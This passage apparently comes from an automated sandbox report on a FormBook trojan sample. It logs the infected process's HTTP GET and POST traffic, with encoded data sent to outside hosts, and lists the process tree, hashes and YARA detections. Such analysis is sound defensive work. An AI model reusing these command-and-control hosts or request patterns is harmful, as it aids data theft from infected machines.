                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.450022195.110.124.133803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:20.111155987 CET514OUTGET /fo8o/?0xilO=7vZpwBG&SHqP-p=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.elettrosistemista.zip
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:56:21.508615971 CET367INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:21 GMT
                                                                              Server: Apache
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.450023217.196.55.202803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:43.579153061 CET786OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.empowermedeco.com
                                                                              Origin: http://www.empowermedeco.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.empowermedeco.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 76 4e 72 6a 75 6d 30 30 49 4c 61 47 32 41 39 45 68 75 48 58 68 74 4e 38 33 6a 33 52 2b 57 52 6b 41 3d 3d
                                                                              Data Ascii: SHqP-p=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuvNrjum00ILaG2A9EhuHXhtN83j3R+WRkA==
                                                                              Nov 21, 2024 12:56:44.789330006 CET1085INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              content-type: text/html
                                                                              content-length: 795
                                                                              date: Thu, 21 Nov 2024 11:56:44 GMT
                                                                              server: LiteSpeed
                                                                              location: https://www.empowermedeco.com/fo8o/
                                                                              platform: hostinger
                                                                              panel: hpanel
                                                                              content-security-policy: upgrade-insecure-requests
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.450024217.196.55.202803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:46.245217085 CET806OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.empowermedeco.com
                                                                              Origin: http://www.empowermedeco.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.empowermedeco.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4a 2b 68 77 71 44 63 39 72 59 2f 4a 32 6a 6d 44 58 34 6d 45 37 4c 4e 4e 4a 54 4a 57 65 6b 6a 6b 6f 3d
                                                                              Data Ascii: SHqP-p=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJ+hwqDc9rY/J2jmDX4mE7LNNJTJWekjko=
                                                                              Nov 21, 2024 12:56:47.450048923 CET1085INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              content-type: text/html
                                                                              content-length: 795
                                                                              date: Thu, 21 Nov 2024 11:56:47 GMT
                                                                              server: LiteSpeed
                                                                              location: https://www.empowermedeco.com/fo8o/
                                                                              platform: hostinger
                                                                              panel: hpanel
                                                                              content-security-policy: upgrade-insecure-requests
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.450025217.196.55.202803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:48.896096945 CET10888OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.empowermedeco.com
                                                                              Origin: http://www.empowermedeco.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.empowermedeco.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 78 48 57 62 6e 4e 6e 39 58 44 6b 63 50 7a 63 2f 49 66 5a 6e 42 33 59 7a 51 6e 57 4b 66 49 72 65 6b 75 34 32 30 73 63 6f 4b 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 5a 52 39 30 30 4c 6f 68 32 6c 42 77 34 6d 37 61 5a 69 6a 72 67 32 72 76 49 72 5a 7a 56 34 75 5a 39 32 42 53 54 4b 34 66 6a 2f 42 38 4e 6d 64 70 76 4c 64 4f 51 6b 65 66 4c 34 52 42 45 32 54 6a 57 6c 79 4a 38 76 47 6d 71 67 48 44 62 38 46 50 [TRUNCATED]
                                                                              Data Ascii: SHqP-p=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJxHWbnNn9XDkcPzc/IfZnB3YzQnWKfIreku420scoKATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHZR900Loh2lBw4m7aZijrg2rvIrZzV4uZ92BSTK4fj/B8NmdpvLdOQkefL4RBE2TjWlyJ8vGmqgHDb8FPeVK7i3wjnW4Pkze5PVOi1QX827zWpkmljH0ttuiIp3QemGg1xQL6nC37nf6XPI4KATMgnVAKME42Z8DL8OybVLpktW6GlxYlU5aI0OpSMJSB4iJRacAN12s2+zc2ARHpFe90cC5U7+mKvZl2yMu8smqwJpNXkSTLUB8JW36BpgzKjTATzL/D1RlQZmMo7+IT5MAsmfDWkWGxGnylL78IzMeSiC9hMlVnpVRDCU5SM4jzvqdIO1s1t1askykCWpwY9wYfHRRA9iTk9HKitsqtVy41gY9YkVKq1RwBhDLTNWY/dQ6g5k4ErKWnmMSZOfYNmHe6uYO+jKxiATAaAERvIpDJfEcBj7wUSFIFuZQAfApvKYpYVtd1CAQte3+V12D6numDy1w2VPWnIKF3xJWfie2IqH0c0iusz09pLReNQv4O0ppV+kALBooou/oMbCnF0CR/pNgJuLc7H7RpmmEFD3/buWJ/BosMnnN3kbzP/LY8gGepMRZk8f5aQCTg/NlPQpwRSIrex4Xbe9T720PRkZoHfkkdtqOpqVW73vhJj4v5PcVmldOF6+gluDjnrRriUwvRUVEXfR2b3hUI5RnHvFqyYrbfV2d6LBYOUsw13oMdbhY7gTrPN6ruraLewSydN24N73HoTY6DF9B0vmGZGuVzmxcwh2ZI9K [TRUNCATED]
                                                                              Nov 21, 2024 12:56:50.143673897 CET1085INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              content-type: text/html
                                                                              content-length: 795
                                                                              date: Thu, 21 Nov 2024 11:56:49 GMT
                                                                              server: LiteSpeed
                                                                              location: https://www.empowermedeco.com/fo8o/
                                                                              platform: hostinger
                                                                              panel: hpanel
                                                                              content-security-policy: upgrade-insecure-requests
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.450026217.196.55.202803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:51.546552896 CET510OUTGET /fo8o/?SHqP-p=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&0xilO=7vZpwBG HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.empowermedeco.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:56:52.794786930 CET1227INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              content-type: text/html
                                                                              content-length: 795
                                                                              date: Thu, 21 Nov 2024 11:56:52 GMT
                                                                              server: LiteSpeed
                                                                              location: https://www.empowermedeco.com/fo8o/?SHqP-p=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&0xilO=7vZpwBG
                                                                              platform: hostinger
                                                                              panel: hpanel
                                                                              content-security-policy: upgrade-insecure-requests
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:06:52:57
                                                                              Start date:21/11/2024
                                                                              Path:C:\Users\user\Desktop\Certificate 1045-20-11.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Certificate 1045-20-11.exe"
                                                                              Imagebase:0x840000
                                                                              File size:1'196'032 bytes
                                                                              MD5 hash:374BFA99CAF54477156253C18125CDC8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:06:52:59
                                                                              Start date:21/11/2024
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Certificate 1045-20-11.exe"
                                                                              Imagebase:0x3d0000
                                                                              File size:46'504 bytes
                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:06:53:07
                                                                              Start date:21/11/2024
                                                                              Path:C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe"
                                                                              Imagebase:0x170000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:3
                                                                              Start time:06:53:09
                                                                              Start date:21/11/2024
                                                                              Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                              Wow64 process (32bit):true
